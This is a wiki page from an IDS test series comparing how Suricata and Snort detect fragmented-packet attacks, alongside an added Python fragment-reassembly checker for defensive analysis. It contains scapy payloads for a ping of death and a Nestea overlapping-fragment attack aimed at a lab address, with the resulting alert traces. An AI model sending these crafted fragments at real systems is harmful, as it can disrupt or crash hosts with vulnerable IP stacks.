Suricata-vs-snort/Test-cases/Fragmented-packets

From aldeid
Fragmented packets

Synthesis

Test            Suricata  Snort
Ping of death   0         1
Nestea attack   1         1
TOTAL           1         2

Ping of death

  • Test: Ping of death
  • Payload (scapy):
from scapy.all import IP, ICMP, fragment, send
send(fragment(IP(dst="192.168.100.35")/ICMP()/("X"*60000)))  # 8-byte ICMP header + 60000 bytes, cut into 1480-byte fragments
  • Suricata trace:
03/10/2011-13:55:12.825014 [**] [1:384:5] ICMP PING [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.37:8 -> 192.168.100.35:0
03/10/2011-13:55:13.512259 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:0 -> 192.168.100.37:0 
  • Suricata score: 0 (only the generic ICMP PING (1:384) and ICMP Echo Reply (1:408) signatures matched; no fragmentation-related event was raised)
  • Snort trace:
[**] [123:8:1] (spp_frag3) Fragmentation overlap [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:32:06.820435 192.168.100.45 -> 192.168.100.48
ICMP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:828
Frag Offset: 0x1CE8   Frag Size: 0x0328
  • Snort score: 1 (the frag3 preprocessor raised 123:8 on the final 808-byte fragment at offset 0x1CE8, i.e. byte 59200)

Nestea attack

  • Test: Nestea attack
  • Payload (scapy):
from scapy.all import IP, UDP, send
send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*10))   # frag 1: 18 bytes at offset 0, MF set
send(IP(dst="192.168.100.35", id=42, frag=48)/("X"*116))            # frag 2: 116 bytes at offset 48*8=384, last fragment (no MF)
send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*224))  # frag 3: 232 bytes at offset 0 again, overlapping frag 1
  • Suricata trace:
03/10/2011-13:58:00.924783 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53
03/10/2011-13:58:30.921484 [**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:11 -> 192.168.100.37:1
03/10/2011-13:58:47.715668 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53
  • Suricata score: 1 (the matches are ET POLICY DNS Update (1:2009702), which fires because scapy's UDP() defaults to source and destination port 53, and ICMP Fragment Reassembly Time Exceeded (1:410) on the target's type 11/code 1 reply; both are signature matches on individual packets, not events from Suricata's defrag engine)
  • Snort trace:
[**] [123:3:1] (spp_frag3) Short fragment, possible DoS attempt [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:33:07.433934 192.168.100.45 -> 192.168.100.48
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF
Frag Offset: 0x0000   Frag Size: 0x0012

[**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**]
[Classification: Misc activity] [Priority: 3] 
04/20-09:33:37.430948 192.168.100.48 -> 192.168.100.45
ICMP TTL:64 TOS:0xC0 ID:38314 IpLen:20 DgmLen:64
Type:11  Code:1  TTL EXCEEDED TIME EXCEEDED IN FRAG REASSEMBLY
** ORIGINAL DATAGRAM DUMP:
192.168.100.45:53 -> 192.168.100.48:53
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF
Len: 10  Csum: 64503
(8 more bytes of original packet)
** END OF DUMP

[**] [123:8:1] (spp_frag3) Fragmentation overlap [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:33:52.409799 192.168.100.45 -> 192.168.100.48
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:252 MF
Frag Offset: 0x0000   Frag Size: 0x00E8
  • Snort score: 1 (frag3 raised 123:3 on the 18-byte first fragment and 123:8 on the third fragment, which re-sends offset 0 with 232 bytes; the ICMP 1:410 match is the target reporting that reassembly of IP ID 42 timed out)
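To make explicit what a fragment engine has to track to raise the events seen in the two traces above, here is a small reassembly checker, written as an added example (it is not code from the aldeid page, nor from Snort's frag3 or Suricata's defrag). It feeds fragment descriptors constructed from the scapy payloads of both tests, flags overlapping fragments, non-final fragments whose data length is not a multiple of 8 (RFC 791), and datagrams that would reassemble to more than 65535 bytes, and reports whether reassembly could complete. The alert names, the `fragment_like_scapy` helper (which mirrors scapy's default 1480-byte `fragsize`) and the extra 65510-byte ping variant are assumptions made for the example; the page only sends the 60000-byte payload.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

IP_MAX_LEN = 65535   # largest IPv4 datagram, header included (RFC 791)
IP_HDR_LEN = 20      # header length of the page's packets (Snort prints IpLen:20)


@dataclass
class Fragment:
    ip_id: int
    offset: int   # first data byte of this fragment inside the datagram (IP frag field * 8)
    length: int   # data bytes carried (Snort's "Frag Size" = DgmLen - IpLen)
    mf: bool      # More Fragments flag


@dataclass
class Reassembly:
    ranges: List[Tuple[int, int]] = field(default_factory=list)  # [start, end) byte ranges seen so far
    total: Optional[int] = None   # datagram data length, known once the MF=0 fragment arrives


def insert_fragment(state: Dict[int, Reassembly], frag: Fragment) -> List[str]:
    """Record one fragment under its IP ID and return the alert names it triggers."""
    alerts = []
    r = state.setdefault(frag.ip_id, Reassembly())
    start, end = frag.offset, frag.offset + frag.length

    # Overlap: some byte of this fragment was already delivered by an earlier
    # fragment of the same IP ID (what Nestea-style attacks exploit).
    if any(start < e and s < end for s, e in r.ranges):
        alerts.append("FRAG_OVERLAP")

    # RFC 791: every fragment except the last carries a multiple of 8 data bytes,
    # since the offset field counts 8-byte units; anything else is malformed.
    if frag.mf and frag.length % 8 != 0:
        alerts.append("FRAG_BAD_LENGTH")

    # Oversize: header plus data past this fragment would exceed 65535 bytes
    # (the classic ping of death).
    if IP_HDR_LEN + end > IP_MAX_LEN:
        alerts.append("FRAG_OVERSIZE")

    if not frag.mf:
        r.total = end
    r.ranges.append((start, end))
    return alerts


def reassembly_status(state: Dict[int, Reassembly], ip_id: int) -> str:
    """'complete' if [0, total) is contiguously covered, else 'incomplete' (hole or no last fragment)."""
    r = state.get(ip_id)
    if r is None or r.total is None:
        return "incomplete"
    covered = 0
    for s, e in sorted(r.ranges):
        if s > covered:
            return "incomplete"   # hole before this fragment; the host will time out (ICMP type 11 code 1)
        covered = max(covered, e)
    return "complete" if covered >= r.total else "incomplete"


def fragment_like_scapy(ip_id: int, data_len: int, fragsize: int = 1480) -> List[Fragment]:
    """Split a datagram's data the way scapy's fragment() does with its default 1480-byte fragsize."""
    frags, offset = [], 0
    while offset < data_len:
        length = min(fragsize, data_len - offset)
        frags.append(Fragment(ip_id, offset, length, mf=offset + length < data_len))
        offset += length
    return frags


def run(frags: List[Fragment]):
    """Feed fragments in order; return ([(fragment index, alert), ...], {ip_id: status})."""
    state: Dict[int, Reassembly] = {}
    alerts = []
    for i, f in enumerate(frags):
        for a in insert_fragment(state, f):
            alerts.append((i, a))
    return alerts, {ip_id: reassembly_status(state, ip_id) for ip_id in state}


# Constructed inputs mirroring the scapy sends on this page.
# Nestea: UDP header (8) + 10 bytes at offset 0 with MF; 116 bytes at frag=48 (byte 384)
# as last fragment; UDP header (8) + 224 bytes at offset 0 again with MF.
NESTEA = [
    Fragment(42, 0, 18, mf=True),
    Fragment(42, 48 * 8, 116, mf=False),
    Fragment(42, 0, 232, mf=True),
]
# Ping of death as sent above: ICMP header (8) + 60000 bytes, cut by scapy's fragment().
POD_60000 = fragment_like_scapy(1, 8 + 60000)
# Assumed oversize variant (not on the page): ping -s 65510 gives 8 + 65510 data bytes.
POD_65510 = fragment_like_scapy(2, 8 + 65510)

if __name__ == "__main__":
    for name, frags in [("nestea", NESTEA), ("pod-60000", POD_60000), ("pod-65510", POD_65510)]:
        alerts, status = run(frags)
        print(name, alerts, status)
```

Two things fall out of running it that the traces only hint at. The 60000-byte payload reassembles to a 60028-byte datagram, which is inside the 65535-byte limit, so a pure oversize check does not fire on it; the 65510-byte variant is what pushes the last fragment over the limit. And the Nestea sequence leaves a hole between byte 232 and byte 384, so reassembly of IP ID 42 can never complete, which is exactly why both traces end with the target's ICMP Fragment Reassembly Time Exceeded reply.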
